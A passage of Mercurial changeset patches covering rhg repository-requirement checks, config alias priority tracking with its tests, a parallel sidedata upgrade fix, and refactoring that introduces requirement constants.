+1,6 @@ use crate::errors::{HgError, HgResultExt}; use crate::repo::{Repo, Vfs}; +use crate::utils::join_display; use std::collections::HashSet; fn parse(bytes: &[u8]) -> Result<HashSet<String>, HgError> { @@ -42,34 +43,48 @@ } pub(crate) fn check(repo: &Repo) -> Result<(), HgError> { - for feature in repo.requirements() { - if !SUPPORTED.contains(&feature.as_str()) { - // TODO: collect and all unknown features and include them in the - // error message? - return Err(HgError::UnsupportedFeature(format!( - "repository requires feature unknown to this Mercurial: {}", - feature - ))); - } + let unknown: Vec<_> = repo + .requirements() + .iter() + .map(String::as_str) + // .filter(|feature| !ALL_SUPPORTED.contains(feature.as_str())) + .filter(|feature| { + !REQUIRED.contains(feature) && !SUPPORTED.contains(feature) + }) + .collect(); + if !unknown.is_empty() { + return Err(HgError::unsupported(format!( + "repository requires feature unknown to this Mercurial: {}", + join_display(&unknown, ", ") + ))); + } + let missing: Vec<_> = REQUIRED + .iter() + .filter(|&&feature| !repo.requirements().contains(feature)) + .collect(); + if !missing.is_empty() { + return Err(HgError::unsupported(format!( + "repository is missing feature required by this Mercurial: {}", + join_display(&missing, ", ") + ))); } Ok(()) } -// TODO: set this to actually-supported features +/// rhg does not support repositories that are *missing* any of these features +const REQUIRED: &[&str] = &["revlogv1", "store", "fncache", "dotencode"]; + +/// rhg supports repository with or without these const SUPPORTED: &[&str] = &[ - "dotencode", - "fncache", "generaldelta", - "revlogv1", SHARED_REQUIREMENT, SHARESAFE_REQUIREMENT, SPARSEREVLOG_REQUIREMENT, RELATIVE_SHARED_REQUIREMENT, - "store", // As of this writing everything rhg does is read-only. // When it starts writing to the repository, it’ll need to either keep the // persistent nodemap up to date or remove this entry: - "persistent-nodemap", + NODEMAP_REQUIREMENT, ]; // Copied from mercurial/requirements.py: diff --git a/rust/hg-core/src/utils.rs b/rust/hg-core/src/utils.rs --- a/rust/hg-core/src/utils.rs +++ b/rust/hg-core/src/utils.rs @@ -11,6 +11,8 @@ use crate::utils::hg_path::HgPath; use im_rc::ordmap::DiffItem; use im_rc::ordmap::OrdMap; +use std::cell::Cell; +use std::fmt; use std::{io::Write, ops::Deref}; pub mod files; @@ -378,3 +380,43 @@ right } } + +/// Join items of the iterable with the given separator, similar to Python’s +/// `separator.join(iter)`. +/// +/// Formatting the return value consumes the iterator. +/// Formatting it again will produce an empty string. +pub fn join_display( + iter: impl IntoIterator<Item = impl fmt::Display>, + separator: impl fmt::Display, +) -> impl fmt::Display { + JoinDisplay { + iter: Cell::new(Some(iter.into_iter())), + separator, + } +} + +struct JoinDisplay<I, S> { + iter: Cell<Option<I>>, + separator: S, +} + +impl<I, T, S> fmt::Display for JoinDisplay<I, S> +where + I: Iterator<Item = T>, + T: fmt::Display, + S: fmt::Display, +{ + fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { + if let Some(mut iter) = self.iter.take() { + if let Some(first) = iter.next() { + first.fmt(f)?; + } + for value in iter { + self.separator.fmt(f)?; + value.fmt(f)?; + } + } + Ok(()) + } +} # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611918148 -3600 # Fri Jan 29 12:02:28 2021 +0100 # Node ID 377689cc295f09a2c5ed52563d39262a9590f56f # Parent a069639783a0d3038805e01badf0479502f08c40 config: test priority involving alias Differential Revision: https://phab.mercurial-scm.org/D9918 diff --git a/tests/test-config.t b/tests/test-config.t --- a/tests/test-config.t +++ b/tests/test-config.t @@ -400,11 +400,15 @@ > pre-include= value-A > %include ./included.rc > post-include= value-A + > [command-templates] + > log = "value-A\n" > EOF $ cat > file-B.rc << EOF > [config-test] > basic = value-B + > [ui] + > logtemplate = "value-B\n" > EOF @@ -437,3 +441,24 @@ $ HGRCPATH="file-A.rc:file-B.rc" hg config config-test.basic --config config-test.basic=value-CLI value-CLI + +Alias ordering +-------------- + +The official config is now `command-templates.log`, the historical +`ui.logtemplate` is a valid alternative for it. + +When both are defined, The config value read the last "win", this should keep +being true if the config have other alias. In other word, the config value read +earlier will be considered "lower level" and the config read later would be +considered "higher level". And higher level values wins. + +BROKEN: currently not the case. + + $ HGRCPATH="file-A.rc" hg log -r . + value-A + $ HGRCPATH="file-B.rc" hg log -r . + value-B + $ HGRCPATH="file-A.rc:file-B.rc" hg log -r . + value-A (known-bad-output !) + value-B (missing-correct-output !) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611918209 -3600 # Fri Jan 29 12:03:29 2021 +0100 # Node ID 702bb73d7330af19a23accbe70303c0156e2b2d2 # Parent 377689cc295f09a2c5ed52563d39262a9590f56f config: test priority involving alias and include Differential Revision: https://phab.mercurial-scm.org/D9919 diff --git a/tests/test-config.t b/tests/test-config.t --- a/tests/test-config.t +++ b/tests/test-config.t @@ -418,6 +418,29 @@ > post-include= value-included > EOF + $ cat > file-C.rc << EOF + > %include ./included-alias-C.rc + > [ui] + > logtemplate = "value-C\n" + > EOF + + $ cat > included-alias-C.rc << EOF + > [command-templates] + > log = "value-included\n" + > EOF + + + $ cat > file-D.rc << EOF + > [command-templates] + > log = "value-D\n" + > %include ./included-alias-D.rc + > EOF + + $ cat > included-alias-D.rc << EOF + > [ui] + > logtemplate = "value-included\n" + > EOF + Simple order checking --------------------- @@ -462,3 +485,16 @@ $ HGRCPATH="file-A.rc:file-B.rc" hg log -r . value-A (known-bad-output !) value-B (missing-correct-output !) + +Alias and include +----------------- + +The pre/post include priority should also apply when tie-breaking alternatives. +See the case above for details about the two config options used. + + $ HGRCPATH="file-C.rc" hg log -r . + value-included (known-bad-output !) + value-C (missing-correct-output !) + $ HGRCPATH="file-D.rc" hg log -r . + value-D (known-bad-output !) + value-included (missing-correct-output !) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611922020 -3600 # Fri Jan 29 13:07:00 2021 +0100 # Node ID 87f8b3add56bf1f518320543293a8f8b3a062b72 # Parent 702bb73d7330af19a23accbe70303c0156e2b2d2 config: test priority involving alias and cli Differential Revision: https://phab.mercurial-scm.org/D9920 diff --git a/tests/test-config.t b/tests/test-config.t --- a/tests/test-config.t +++ b/tests/test-config.t @@ -498,3 +498,10 @@ $ HGRCPATH="file-D.rc" hg log -r . value-D (known-bad-output !) value-included (missing-correct-output !) + +command line override +--------------------- + + $ HGRCPATH="file-A.rc:file-B.rc" hg log -r . --config ui.logtemplate="value-CLI\n" + value-A (known-bad-output !) + value-CLI (missing-correct-output !) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1614625706 -3600 # Mon Mar 01 20:08:26 2021 +0100 # Node ID dde86beca38896bae0cdee3393cb1c33dbdc7add # Parent 87f8b3add56bf1f518320543293a8f8b3a062b72 copies: tests and fix parallel computation of changed file information The code was mixing variable name and misbehaving in some case. This changeset fix it and also add a tests to validate it does not regress. Without the fix, the parallel-upgrade misbehavior in random ways. Differential Revision: https://phab.mercurial-scm.org/D10084 diff --git a/mercurial/metadata.py b/mercurial/metadata.py --- a/mercurial/metadata.py +++ b/mercurial/metadata.py @@ -882,14 +882,14 @@ data = {}, False if util.safehasattr(revlog, b'filteredrevs'): # this is a changelog # Is the data previously shelved ? - sidedata = staging.pop(rev, None) - if sidedata is None: + data = staging.pop(rev, None) + if data is None: # look at the queued result until we find the one we are lookig # for (shelve the other ones) r, data = sidedataq.get() while r != rev: staging[r] = data - r, sidedata = sidedataq.get() + r, data = sidedataq.get() tokens.release() sidedata, has_copies_info = data new_flag = 0 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -1,4 +1,4 @@ -#testcases filelog compatibility changeset sidedata upgraded +#testcases filelog compatibility changeset sidedata upgraded upgraded-parallel ===================================================== Test Copy tracing for chain of copies involving merge @@ -1486,6 +1486,44 @@ #endif +#if upgraded-parallel + $ cat >> $HGRCPATH << EOF + > [format] + > exp-use-side-data = yes + > exp-use-copies-side-data-changeset = yes + > [experimental] + > worker.repository-upgrade=yes + > [worker] + > enabled=yes + > numcpus=8 + > EOF + $ hg debugformat -v + format-variant repo config default + fncache: yes yes yes + dotencode: yes yes yes + generaldelta: yes yes yes + share-safe: no no no + sparserevlog: yes yes yes + sidedata: no yes no + persistent-nodemap: no no no + copies-sdc: no yes no + plain-cl-delta: yes yes yes + compression: * (glob) + compression-level: default default default + $ hg debugupgraderepo --run --quiet + upgrade will perform the following actions: + + requirements + preserved: * (glob) + added: exp-copies-sidedata-changeset, exp-sidedata-flag + + processed revlogs: + - all-filelogs + - changelog + - manifest + +#endif + #if no-compatibility no-filelog no-changeset @@ -3172,18 +3210,21 @@ a (filelog !) a (sidedata !) a (upgraded !) + a (upgraded-parallel !) $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mAE,Km")' f A f a (filelog !) a (sidedata !) a (upgraded !) + a (upgraded-parallel !) $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mK,AEm")' f A f a (filelog !) a (sidedata !) a (upgraded !) + a (upgraded-parallel !) The result from mEAm is the same for the subsequent merge: @@ -3193,18 +3234,21 @@ a (filelog !) b (sidedata !) b (upgraded !) + b (upgraded-parallel !) $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mEA,Jm")' f A f a (filelog !) b (sidedata !) b (upgraded !) + b (upgraded-parallel !) $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mJ,EAm")' f A f a (filelog !) b (sidedata !) b (upgraded !) + b (upgraded-parallel !) Subcase: chaining conflicting rename resolution ``````````````````````````````````````````````` @@ -3221,18 +3265,21 @@ r (filelog !) p (sidedata !) p (upgraded !) + p (upgraded-parallel !) $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mPQ,Tm")' v A v r (filelog !) p (sidedata !) p (upgraded !) + p (upgraded-parallel !) $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mT,PQm")' v A v r (filelog !) p (sidedata !) p (upgraded !) + p (upgraded-parallel !) The result from mQPm is the same for the subsequent merge: @@ -3250,6 +3297,7 @@ r (filelog !) r (sidedata !) r (upgraded !) + r (upgraded-parallel !) Subcase: chaining salvage information during a merge @@ -3330,11 +3378,13 @@ a (filelog !) h (sidedata !) h (upgraded !) + h (upgraded-parallel !) $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mGFm")' d A d a (filelog !) a (sidedata !) a (upgraded !) + a (upgraded-parallel !) Chained output @@ -3343,11 +3393,13 @@ a (filelog !) h (sidedata !) h (upgraded !) + h (upgraded-parallel !) $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mFG,Om")' d A d a (filelog !) h (sidedata !) h (upgraded !) + h (upgraded-parallel !) $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mGF,Nm")' d @@ -3373,12 +3425,14 @@ a (filelog !) a (sidedata !) a (upgraded !) + a (upgraded-parallel !) $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mAE-change,Km")' f A f a (filelog !) a (sidedata !) a (upgraded !) + a (upgraded-parallel !) $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mK,AE-change-m")' f A f @@ -3392,15 +3446,18 @@ a (filelog !) b (sidedata !) b (upgraded !) + b (upgraded-parallel !) $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mEA-change,Jm")' f A f a (filelog !) b (sidedata !) b (upgraded !) + b (upgraded-parallel !) $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mJ,EA-change-m")' f A f a (filelog !) b (sidedata !) b (upgraded !) + b (upgraded-parallel !) # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1614638669 28800 # Mon Mar 01 14:44:29 2021 -0800 # Node ID f2fc34e882388423f1bfca0a9a1ce87e1080d0e3 # Parent dde86beca38896bae0cdee3393cb1c33dbdc7add copies-rust: remove an unnecessary format!() inside assert!() The `assert!()` macro supports formatting. Rust 2021 no longer supports an unnecessary `format!()` inside it. I noticed because I recently update my Rust toolchain and `test-check-cargo-lock.t` started failing. Differential Revision: https://phab.mercurial-scm.org/D10085 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -357,7 +357,7 @@ } fn untokenize(&self, token: PathToken) -> &HgPathBuf { - assert!(token < self.path.len(), format!("Unknown token: {}", token)); + assert!(token < self.path.len(), "Unknown token: {}", token); &self.path[token] } } # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611963162 -3600 # Sat Jan 30 00:32:42 2021 +0100 # Node ID 7621ab4005bf34c4261a093d256f0e884d86324c # Parent f2fc34e882388423f1bfca0a9a1ce87e1080d0e3 config: use a new `alter` method in `fixconfig` The `set` function is doing various work related to metadata (eg: the source, later the level). However the `fixconfig` call only updating some values according to standard processing, not changing any of the related metadata. So we introduce a new method and use it there. Differential Revision: https://phab.mercurial-scm.org/D9924 diff --git a/mercurial/config.py b/mercurial/config.py --- a/mercurial/config.py +++ b/mercurial/config.py @@ -108,6 +108,16 @@ self._source = self._source.preparewrite() self._source[(section, item)] = source + def alter(self, section, key, new_value): + """alter a value without altering its source or level + + This method is meant to be used by `ui.fixconfig` only.""" + item = self._data[section][key] + size = len(item) + new_item = (new_value,) + item[1:] + assert len(new_item) == size + self._data[section][key] = new_item + def restore(self, data): """restore data returned by self.backup""" self._source = self._source.preparewrite() diff --git a/mercurial/ui.py b/mercurial/ui.py --- a/mercurial/ui.py +++ b/mercurial/ui.py @@ -554,7 +554,7 @@ p = util.expandpath(p) if not util.hasscheme(p) and not os.path.isabs(p): p = os.path.normpath(os.path.join(root, p)) - c.set(b"paths", n, p) + c.alter(b"paths", n, p) if section in (None, b'ui'): # update ui options # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611912483 -3600 # Fri Jan 29 10:28:03 2021 +0100 # Node ID d3df397e7a59b416ead210ebcac50579118a5c35 # Parent 7621ab4005bf34c4261a093d256f0e884d86324c config: track "source" along side value Currently the source is stored in a entirely different way than the data. This is impractical. Especially if we are about to add more of such metadata. So lets put them back together. Differential Revision: https://phab.mercurial-scm.org/D9925 diff --git a/mercurial/config.py b/mercurial/config.py --- a/mercurial/config.py +++ b/mercurial/config.py @@ -27,9 +27,6 @@ if data: for k in data._data: self._data[k] = data[k].copy() - self._source = data._source.copy() - else: - self._source = util.cowdict() def copy(self): return config(self) @@ -48,13 +45,11 @@ yield d def update(self, src): - self._source = self._source.preparewrite() for s, n in src._unset: ds = self._data.get(s, None) if ds is not None and n in ds: self._data[s] = ds.preparewrite() del self._data[s][n] - del self._source[(s, n)] for s in src: ds = self._data.get(s, None) if ds: @@ -62,31 +57,40 @@ else: self._data[s] = util.cowsortdict() self._data[s].update(src._data[s]) - self._source.update(src._source) + + def _get(self, section, item): + return self._data.get(section, {}).get(item) def get(self, section, item, default=None): - return self._data.get(section, {}).get(item, default) + result = self._get(section, item) + if result is None: + return default + return result[0] - def backup(self, section, item): + def backup(self, section, key): """return a tuple allowing restore to reinstall a previous value The main reason we need it is because it handles the "no data" case. """ try: - value = self._data[section][item] - source = self.source(section, item) - return (section, item, value, source) + item = self._data[section][key] except KeyError: - return (section, item) + return (section, key) + else: + return (section, key) + item def source(self, section, item): - return self._source.get((section, item), b"") + result = self._get(section, item) + if result is None: + return b"" + return result[1] def sections(self): return sorted(self._data.keys()) def items(self, section): - return list(pycompat.iteritems(self._data.get(section, {}))) + items = pycompat.iteritems(self._data.get(section, {})) + return [(k, v) for (k, (v, s)) in items] def set(self, section, item, value, source=b""): if pycompat.ispy3: @@ -103,10 +107,7 @@ self._data[section] = util.cowsortdict() else: self._data[section] = self._data[section].preparewrite() - self._data[section][item] = value - if source: - self._source = self._source.preparewrite() - self._source[(section, item)] = source + self._data[section][item] = (value, source) def alter(self, section, key, new_value): """alter a value without altering its source or level @@ -120,19 +121,17 @@ def restore(self, data): """restore data returned by self.backup""" - self._source = self._source.preparewrite() - if len(data) == 4: + if len(data) != 2: # restore old data - section, item, value, source = data + section, key = data[:2] + item = data[2:] self._data[section] = self._data[section].preparewrite() - self._data[section][item] = value - self._source[(section, item)] = source + self._data[section][key] = item else: # no data before, remove everything section, item = data if section in self._data: self._data[section].pop(item, None) - self._source.pop((section, item), None) def parse(self, src, data, sections=None, remap=None, include=None): sectionre = util.re.compile(br'\[([^\[]+)\]') # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611915709 -3600 # Fri Jan 29 11:21:49 2021 +0100 # Node ID a3dced4b7b04d06e82e6831fa77d04c0f68a2e28 # Parent d3df397e7a59b416ead210ebcac50579118a5c35 config: track the "level" of a value Config value now remember the "level" of the config that loaded it. This will be used to ensure good priority management for alias. Differential Revision: https://phab.mercurial-scm.org/D9926 diff --git a/mercurial/config.py b/mercurial/config.py --- a/mercurial/config.py +++ b/mercurial/config.py @@ -22,11 +22,19 @@ class config(object): def __init__(self, data=None): + self._current_source_level = 0 self._data = {} self._unset = [] if data: for k in data._data: self._data[k] = data[k].copy() + self._current_source_level = data._current_source_level + 1 + + def new_source(self): + """increment the source counter + + This is used to define source priority when reading""" + self._current_source_level += 1 def copy(self): return config(self) @@ -45,6 +53,9 @@ yield d def update(self, src): + current_level = self._current_source_level + current_level += 1 + max_level = self._current_source_level for s, n in src._unset: ds = self._data.get(s, None) if ds is not None and n in ds: @@ -56,7 +67,12 @@ self._data[s] = ds.preparewrite() else: self._data[s] = util.cowsortdict() - self._data[s].update(src._data[s]) + for k, v in src._data[s].items(): + value, source, level = v + level += current_level + max_level = max(level, current_level) + self._data[s][k] = (value, source, level) + self._current_source_level = max_level def _get(self, section, item): return self._data.get(section, {}).get(item) @@ -85,12 +101,18 @@ return b"" return result[1] + def level(self, section, item): + result = self._get(section, item) + if result is None: + return None + return result[2] + def sections(self): return sorted(self._data.keys()) def items(self, section): items = pycompat.iteritems(self._data.get(section, {})) - return [(k, v) for (k, (v, s)) in items] + return [(k, v[0]) for (k, v) in items] def set(self, section, item, value, source=b""): if pycompat.ispy3: @@ -107,7 +129,7 @@ self._data[section] = util.cowsortdict() else: self._data[section] = self._data[section].preparewrite() - self._data[section][item] = (value, source) + self._data[section][item] = (value, source, self._current_source_level) def alter(self, section, key, new_value): """alter a value without altering its source or level @@ -215,6 +237,7 @@ raise error.ConfigError(message, (b"%s:%d" % (src, line))) def read(self, path, fp=None, sections=None, remap=None): + self.new_source() if not fp: fp = util.posixfile(path, b'rb') assert ( @@ -229,6 +252,8 @@ def include(rel, remap, sections): abs = os.path.normpath(os.path.join(dir, rel)) self.read(abs, remap=remap, sections=sections) + # anything after the include has a higher level + self.new_source() self.parse( path, fp.read(), sections=sections, remap=remap, include=include diff --git a/mercurial/ui.py b/mercurial/ui.py --- a/mercurial/ui.py +++ b/mercurial/ui.py @@ -302,6 +302,11 @@ if k in self.environ: self._exportableenviron[k] = self.environ[k] + def _new_source(self): + self._ocfg.new_source() + self._tcfg.new_source() + self._ucfg.new_source() + @classmethod def load(cls): """Create a ui and load global and user configs""" @@ -313,6 +318,7 @@ elif t == b'resource': u.read_resource_config(f, trust=True) elif t == b'items': + u._new_source() sections = set() for section, name, value, source in f: # do not set u._ocfg @@ -325,6 +331,7 @@ else: raise error.ProgrammingError(b'unknown rctype: %s' % t) u._maybetweakdefaults() + u._new_source() # anything after that is a different level return u def _maybetweakdefaults(self): # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611919031 -3600 # Fri Jan 29 12:17:11 2021 +0100 # Node ID b91a695b3b084e3d676a5e6aa1f6192fecf4aa8e # Parent a3dced4b7b04d06e82e6831fa77d04c0f68a2e28 config: use level to properly deal with value priority A higher priority alias will now take precedence over lower priority ones. This was a requirements step before using alias more widely, especially to rename existing and established config option. Differential Revision: https://phab.mercurial-scm.org/D9927 diff --git a/mercurial/ui.py b/mercurial/ui.py --- a/mercurial/ui.py +++ b/mercurial/ui.py @@ -662,11 +662,18 @@ msg %= (section, name, pycompat.bytestr(default)) self.develwarn(msg, 2, b'warn-config-default') + candidates = [] + config = self._data(untrusted) for s, n in alternates: - candidate = self._data(untrusted).get(s, n, None) + candidate = config.get(s, n, None) if candidate is not None: - value = candidate - break + candidates.append((s, n, candidate)) + if candidates: + + def level(x): + return config.level(x[0], x[1]) + + value = max(candidates, key=level)[2] if self.debugflag and not untrusted and self._reportuntrusted: for s, n in alternates: diff --git a/tests/test-config.t b/tests/test-config.t --- a/tests/test-config.t +++ b/tests/test-config.t @@ -476,15 +476,12 @@ earlier will be considered "lower level" and the config read later would be considered "higher level". And higher level values wins. -BROKEN: currently not the case. - $ HGRCPATH="file-A.rc" hg log -r . value-A $ HGRCPATH="file-B.rc" hg log -r . value-B $ HGRCPATH="file-A.rc:file-B.rc" hg log -r . - value-A (known-bad-output !) - value-B (missing-correct-output !) + value-B Alias and include ----------------- @@ -493,15 +490,12 @@ See the case above for details about the two config options used. $ HGRCPATH="file-C.rc" hg log -r . - value-included (known-bad-output !) - value-C (missing-correct-output !) + value-C $ HGRCPATH="file-D.rc" hg log -r . - value-D (known-bad-output !) - value-included (missing-correct-output !) + value-included command line override --------------------- $ HGRCPATH="file-A.rc:file-B.rc" hg log -r . --config ui.logtemplate="value-CLI\n" - value-A (known-bad-output !) - value-CLI (missing-correct-output !) + value-CLI # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1613729836 -3600 # Fri Feb 19 11:17:16 2021 +0100 # Node ID 357d2ea95ce9e5d2d24135489dd0d654c67816fc # Parent b91a695b3b084e3d676a5e6aa1f6192fecf4aa8e changegroup: use the local variable instead of reaching through self Gratuitous cleanup while I was here. Differential Revision: https://phab.mercurial-scm.org/D10023 diff --git a/mercurial/changegroup.py b/mercurial/changegroup.py --- a/mercurial/changegroup.py +++ b/mercurial/changegroup.py @@ -1009,7 +1009,7 @@ mfdicts = None if self._ellipses and self._isshallow: mfdicts = [ - (self._repo.manifestlog[n].read(), lr) + (repo.manifestlog[n].read(), lr) for (n, lr) in pycompat.iteritems(manifests) ] # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1613657265 -3600 # Thu Feb 18 15:07:45 2021 +0100 # Node ID 3941fe53670dd57592ce3bfb31c5e4008b6e59da # Parent 357d2ea95ce9e5d2d24135489dd0d654c67816fc error: add `hint` attribute to `SidedataHashError` This prevents an exception within an exception because `hint` does not exist. Differential Revision: https://phab.mercurial-scm.org/D10024 diff --git a/mercurial/error.py b/mercurial/error.py --- a/mercurial/error.py +++ b/mercurial/error.py @@ -55,6 +55,7 @@ class SidedataHashError(RevlogError): def __init__(self, key, expected, got): + self.hint = None self.sidedatakey = key self.expecteddigest = expected self.actualdigest = got # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1614776445 -3600 # Wed Mar 03 14:00:45 2021 +0100 # Node ID ee91966aec0ff3c957d3a4d86b66abf3d306a68c # Parent 3941fe53670dd57592ce3bfb31c5e4008b6e59da requirements: add constant for revlog v1 requirement Since this series is adding a new requirement, we might as well clean up while we're here. Differential Revision: https://phab.mercurial-scm.org/D10105 diff --git a/mercurial/exchangev2.py b/mercurial/exchangev2.py --- a/mercurial/exchangev2.py +++ b/mercurial/exchangev2.py @@ -22,6 +22,7 @@ narrowspec, phases, pycompat, + requirements as requirementsmod, setdiscovery, ) from .interfaces import repository @@ -183,7 +184,7 @@ # TODO This is super hacky. There needs to be a storage API for this. We # also need to check for compatibility with the remote. - if b'revlogv1' not in repo.requirements: + if requirementsmod.REVLOGV1_REQUIREMENT not in repo.requirements: return False return True diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -974,7 +974,7 @@ # opener options for it because those options wouldn't do anything # meaningful on such old repos. if ( - b'revlogv1' in requirements + requirementsmod.REVLOGV1_REQUIREMENT in requirements or requirementsmod.REVLOGV2_REQUIREMENT in requirements ): options.update(resolverevlogstorevfsoptions(ui, requirements, features)) @@ -998,7 +998,7 @@ options = {} options[b'flagprocessors'] = {} - if b'revlogv1' in requirements: + if requirementsmod.REVLOGV1_REQUIREMENT in requirements: options[b'revlogv1'] = True if requirementsmod.REVLOGV2_REQUIREMENT in requirements: options[b'revlogv2'] = True @@ -1199,7 +1199,7 @@ # being successful (repository sizes went up due to worse delta # chains), and the code was deleted in 4.6. supportedformats = { - b'revlogv1', + requirementsmod.REVLOGV1_REQUIREMENT, b'generaldelta', requirementsmod.TREEMANIFEST_REQUIREMENT, requirementsmod.COPIESSDC_REQUIREMENT, @@ -3410,7 +3410,7 @@ % createopts[b'backend'] ) - requirements = {b'revlogv1'} + requirements = {requirementsmod.REVLOGV1_REQUIREMENT} if ui.configbool(b'format', b'usestore'): requirements.add(b'store') if ui.configbool(b'format', b'usefncache'): @@ -3458,7 +3458,7 @@ revlogv2 = ui.config(b'experimental', b'revlogv2') if revlogv2 == b'enable-unstable-format-and-corrupt-my-data': - requirements.remove(b'revlogv1') + requirements.remove(requirementsmod.REVLOGV1_REQUIREMENT) # generaldelta is implied by revlogv2. requirements.discard(b'generaldelta') requirements.add(requirementsmod.REVLOGV2_REQUIREMENT) diff --git a/mercurial/requirements.py b/mercurial/requirements.py --- a/mercurial/requirements.py +++ b/mercurial/requirements.py @@ -21,6 +21,8 @@ # Stores manifest in Tree structure TREEMANIFEST_REQUIREMENT = b'treemanifest' +REVLOGV1_REQUIREMENT = b'revlogv1' + # Increment the sub-version when the revlog v2 format changes to lock out old # clients. REVLOGV2_REQUIREMENT = b'exp-revlogv2.1' diff --git a/mercurial/streamclone.py b/mercurial/streamclone.py --- a/mercurial/streamclone.py +++ b/mercurial/streamclone.py @@ -20,6 +20,7 @@ narrowspec, phases, pycompat, + requirements as requirementsmod, scmutil, store, util, @@ -83,7 +84,7 @@ # is advertised and contains a comma-delimited list of requirements. requirements = set() if remote.capable(b'stream'): - requirements.add(b'revlogv1') + requirements.add(requirementsmod.REVLOGV1_REQUIREMENT) else: streamreqs = remote.capable(b'streamreqs') # This is weird and shouldn't happen with modern servers. diff --git a/mercurial/upgrade_utils/actions.py b/mercurial/upgrade_utils/actions.py --- a/mercurial/upgrade_utils/actions.py +++ b/mercurial/upgrade_utils/actions.py @@ -857,7 +857,7 @@ """ return { # Introduced in Mercurial 0.9.2. - b'revlogv1', + requirements.REVLOGV1_REQUIREMENT, # Introduced in Mercurial 0.9.2. b'store', } @@ -937,7 +937,7 @@ b'dotencode', b'fncache', b'generaldelta', - b'revlogv1', + requirements.REVLOGV1_REQUIREMENT, b'store', requirements.SPARSEREVLOG_REQUIREMENT, requirements.SIDEDATA_REQUIREMENT, diff --git a/mercurial/wireprotov1server.py b/mercurial/wireprotov1server.py --- a/mercurial/wireprotov1server.py +++ b/mercurial/wireprotov1server.py @@ -27,6 +27,7 @@ exchange, pushkey as pushkeymod, pycompat, + requirements as requirementsmod, streamclone, util, wireprototypes, @@ -310,7 +311,7 @@ caps.append(b'stream-preferred') requiredformats = repo.requirements & repo.supportedformats # if our local revlogs are just revlogv1, add 'stream' cap - if not requiredformats - {b'revlogv1'}: + if not requiredformats - {requirementsmod.REVLOGV1_REQUIREMENT}: caps.append(b'stream') # otherwise, add 'streamreqs' detailing our local revlog format else: # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1614771023 -3600 # Wed Mar 03 12:30:23 2021 +0100 # Node ID f4c325bf80fc4c7cd12d65f0489ea8f80e9db54c # Parent ee91966aec0ff3c957d3a4d86b66abf3d306a68c requirements: also add a generaldelta constant Continue the cleanup to the remaining requirements Differential Revision: https://phab.mercurial-scm.org/D10106 diff --git a/mercurial/bundlecaches.py b/mercurial/bundlecaches.py --- a/mercurial/bundlecaches.py +++ b/mercurial/bundlecaches.py @@ -9,6 +9,7 @@ from . import ( error, + requirements as requirementsmod, sslutil, util, ) @@ -164,7 +165,7 @@ compression = spec version = b'v1' # Generaldelta repos require v2. - if b'generaldelta' in repo.requirements: + if requirementsmod.GENERALDELTA_REQUIREMENT in repo.requirements: version = b'v2' # Modern compression engines require v2. if compression not in _bundlespecv1compengines: diff --git a/mercurial/changegroup.py b/mercurial/changegroup.py --- a/mercurial/changegroup.py +++ b/mercurial/changegroup.py @@ -1549,7 +1549,7 @@ # will support. For example, all hg versions that support generaldelta also # support changegroup 02. versions = supportedoutgoingversions(repo) - if b'generaldelta' in repo.requirements: + if requirements.GENERALDELTA_REQUIREMENT in repo.requirements: versions.discard(b'01') assert versions return min(versions) diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -1003,7 +1003,7 @@ if requirementsmod.REVLOGV2_REQUIREMENT in requirements: options[b'revlogv2'] = True - if b'generaldelta' in requirements: + if requirementsmod.GENERALDELTA_REQUIREMENT in requirements: options[b'generaldelta'] = True # experimental config: format.chunkcachesize @@ -1200,7 +1200,7 @@ # chains), and the code was deleted in 4.6. supportedformats = { requirementsmod.REVLOGV1_REQUIREMENT, - b'generaldelta', + requirementsmod.GENERALDELTA_REQUIREMENT, requirementsmod.TREEMANIFEST_REQUIREMENT, requirementsmod.COPIESSDC_REQUIREMENT, requirementsmod.REVLOGV2_REQUIREMENT, @@ -3442,7 +3442,7 @@ requirements.add(b'exp-compression-%s' % compengine) if scmutil.gdinitconfig(ui): - requirements.add(b'generaldelta') + requirements.add(requirementsmod.GENERALDELTA_REQUIREMENT) if ui.configbool(b'format', b'sparse-revlog'): requirements.add(requirementsmod.SPARSEREVLOG_REQUIREMENT) @@ -3460,7 +3460,7 @@ if revlogv2 == b'enable-unstable-format-and-corrupt-my-data': requirements.remove(requirementsmod.REVLOGV1_REQUIREMENT) # generaldelta is implied by revlogv2. - 